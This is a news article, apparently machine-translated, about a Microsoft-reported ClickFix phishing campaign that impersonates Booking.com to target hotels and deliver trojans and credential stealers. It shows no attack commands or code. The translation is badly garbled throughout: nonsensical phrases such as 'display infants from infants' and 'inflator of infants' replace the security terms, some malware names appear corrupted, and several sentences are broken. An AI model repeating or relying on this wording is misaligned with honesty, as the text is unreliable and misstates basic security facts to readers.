- Microsoft warns about a new Phishing campaign that is passed through Booking.com
- It is aimed at companies in the hospitality industry
- The objective is to display infants from infants and Trojans
Hotels, Resorts and other companies in the hotel industry are being attacked with a sophisticated Phishing Clickfix campaign that is passed through Booking.com.
A new Microsoft Intelligence report states that the Phishing campaign is “in rapid evolution” and addresses companies around the world.
The objective of the campaign is to steal the payment of people and personal data, which could lead to electronic fraud and reputation damage for victims organizations.
Storm-1865
First, the attackers create a notification email of Booking.com, discussing things like reviews of guests or accounts. Companies that do not detect the scam are redirected to a false captcha puzzle, and if they solve it, they are asked for an error message. That false error message also comes with a solution, which includes copying a command and paste it/run on the execute program.
Instead of solving the problem, executing the program Download one of the multiple malware strains used in this campaign: XWORD, Lumma Stealer or Venomrat. These are different types of malware with different characteristics.
While Venomrat, for example, is a remote access Trojan that gives attackers access to the victims devices, Lumma is an inflator of infants who takes login credentials and other secrets stored in the web browser, and in other parts of the device.
Microsoft attributed the campaign to a threat actor that tracks as Storm-1865, a group without prior registration. Apparently, the campaign began in December 2024, and there is no information about how many companies, there are, they were seen to it.
Clickfix fraud has become more popular lately, and Techradar Pro has reported on it on numerous occasions this year. It is an evolution of the old “IT technician” scam, in which a victim receives an emerging window that passes through an accredited company that says that his computer is broken/infected.
The emerging window shares a phone number that the victim can call, to talk to a IT technician and solve the problem. The “technician” ends up installing malware.
While telephone scams are still very alive, the clickfix campaign focuses mainly on the victim who does most of the work, installing malware through a less obvious process (paste an execution command).
